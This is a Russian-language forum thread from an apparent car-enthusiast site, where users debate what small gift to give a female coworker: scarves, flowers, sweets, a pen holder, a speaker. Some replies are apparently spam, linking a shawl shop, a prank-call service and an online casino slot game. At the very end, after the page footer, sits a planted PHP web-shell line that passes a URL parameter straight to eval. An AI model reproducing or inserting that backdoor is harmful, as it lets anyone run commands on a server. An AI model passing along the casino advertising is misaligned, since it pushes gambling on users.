+ Ответить в теме
Показано с 1 по 8 из 8

Тема: что такого выбрать?


  1. #1
    Мимо проходил Дарий is on a distinguished road Аватар для Дарий
    Регистрация
    03.04.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    50

    что такого выбрать?

    Хочу сделать небольшой символический подарок коллеге девушке! Думаю о каком то аксессуаре! Что можно подарить?

  2. #2
    Мимо проходил MihaV is on a distinguished road Аватар для MihaV
    Регистрация
    29.11.2017
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    54
    Может какую то брошь? Или такое уже не носят? А просто цветы никак?

  3. #3
    Мимо проходил Zelen' is on a distinguished road Аватар для Zelen'
    Регистрация
    02.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    61
    Цитата Сообщение от Дарий Посмотреть сообщение
    Хочу сделать небольшой символический подарок коллеге девушке! Думаю о каком то аксессуаре! Что можно подарить?

    ох, Дарий, я бы вам очень порекомендовала остановиться на выборе платка,шарфа или палантина. как показывает личный опыт, в офисах очень часто бывает дико холодно, когда отключили отопление или когда горе-коллеги страшно любят проветривания даже в -4.
    поэтому такой теплый подарок будет весьма, кстати. вот тут можете больше почитать о преимуществах - https://platoktut.ru/platki/kashemirovyj-platok.html и уверяю вас,это стоящий подарок! вашей коллеге понравится)

  4. #4
    Мимо проходил Larik is on a distinguished road Аватар для Larik
    Регистрация
    04.01.2019
    Откуда
    Россия.
    Машина
    Golf 4
    Сообщений
    65
    По-моему, платок, это лишнее. А если она их не носит, да и вообще, такие подарки дарят родственникам, или друзьям, а для коллеги можно придумать, что-то другое. Может, какую-нибудь интересную подставку для ручек, или блокнот...

  5. #5
    Мимо проходил Nevron is on a distinguished road Аватар для Nevron
    Регистрация
    26.01.2019
    Откуда
    Россия.
    Машина
    GOLF R
    Сообщений
    56
    Мне кажется, что лучшим подарком для вашей коллеги будут цветы, и можно еще добавить коробку конфет. А дарить какие-либо аксессуары для малознакомых людей, это не тот вариант. Если хотите удивить, то лучше всего это сделать поздравлением, а не подарком. Кстати, а как у вашей коллеги с юмором? Если она понимает шутки, то, как вариант можно отправить ей по телефону голосовой розыгрыш. Как вам такой вариант? В общем, если заинтересуетесь, то здесь есть вся необходимая информация https://golosovye.ru/rozygryshi/ .

  6. #6
    Мимо проходил Zelen' is on a distinguished road Аватар для Zelen'
    Регистрация
    02.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    61
    Цитата Сообщение от Larik Посмотреть сообщение
    По-моему, платок, это лишнее. А если она их не носит, да и вообще, такие подарки дарят родственникам, или друзьям, а для коллеги можно придумать, что-то другое. Может, какую-нибудь интересную подставку для ручек, или блокнот...
    во-первых, скажите, такое люди не носят?




    а, во-вторых, подставка для ручек? господи, что за примитивщина? такие подарки были актуальны в 96. если у вас есть машина времени, то спорить о годности подарка не буду.

    ну, и как бы не стоит забывать о том, что в настоящей, классной компании все коллеги как одна семья. и подарить шарф - это с психологической точки зрения проявление теплоты.
    а подарить подставку для ручек - это проявить, мягко говоря, свой пофигизм к личности коллеги, выбрав в качестве подарка дешевку из первого попавшегося магазина канцтоваров.

    ---------- Сообщение добавлено в 22:28 ---------- Предыдущее сообщение размещено в 22:26 ----------

    Цитата Сообщение от Nevron Посмотреть сообщение
    Мне кажется, что лучшим подарком для вашей коллеги будут цветы, и можно еще добавить коробку конфет. А дарить какие-либо аксессуары для малознакомых людей, это не тот вариант. Если хотите удивить, то лучше всего это сделать поздравлением, а не подарком. Кстати, а как у вашей коллеги с юмором? Если она понимает шутки, то, как вариант можно отправить ей по телефону голосовой розыгрыш. Как вам такой вариант? В общем, если заинтересуетесь, то здесь есть вся необходимая информация

    коллега - это человек, с которым вы проводите больше времени, чем со своими родителями. и если у вас в компании коллеги - это малознакомые личности, значит вы работаете в компании не очень.
    цветы и коробка конфет, конечно, получше подставки для ручек, но такая же банальщина. это скучно, избито, тривиально.

    где же ваш креатив? где индивидуальный подход? где желание увидеть эмоции на лице именинника?


    С К У Ч Н О !


    ну, а ваша классная идея про розыгрыш - это вообще тотальный маразм. серьезно. я вообще не беру трубку, если звонит левый номер. все, кто мне нужен, у меня записаны.
    а розыгрыш - это скорее развеселости для вас, но не для именинника. чушь.

  7. #7
    Мимо проходил Каролина123 is on a distinguished road Аватар для Каролина123
    Регистрация
    19.05.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    7
    портативная акустика как вариант хорошего подарка

  8. #8
    Новичок Vulkree is on a distinguished road Аватар для Vulkree
    Регистрация
    21.05.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    111
    Не желаете ли виртуально побывать в настоящей избе – пожить в деревянном домике, поесть пирогов из печи и попить ароматного чаю? Играйте в Keks в Космолот Украина онлайн. Такая возможность предоставится вам в гемблинге. Компания Igrosoft выпустила автомат, стилизованный эксклюзивно под русскую деревню. На лавке в ожидании родни сидит бабушка и увлеченно вяжет шерстяные носки. Под лавкой разлегся черный ленивый кот и круглосуточно спит. А на столе уже все накрыто к приходу гостей. Юзеру предстоит собирать в линии многочисленные предметы русского застолья. Также есть возможность ощутить себя участником сказки – будет специальный бонус. А посетить игровой автомат можно здесь https://cosmo.lots-online.com/igrovoj-avtomat-keks/.

+ Ответить в теме

Похожие темы

  1. как добиться такого звука вылопа на 4-х цилиндрах? (видео)
    от valj в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 12
    Последнее сообщение: 02.10.2023, 04:07
  2. Ответов: 2
    Последнее сообщение: 22.10.2014, 11:47
  3. Помогите выбрать MK5 GTI
    от vanchello в разделе Отзывы / Выбор
    Ответов: 0
    Последнее сообщение: 03.03.2012, 21:04
  4. Как Избежать Такого?
    от Lina в разделе Законодательство и страхование
    Ответов: 10
    Последнее сообщение: 16.07.2008, 19:27

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}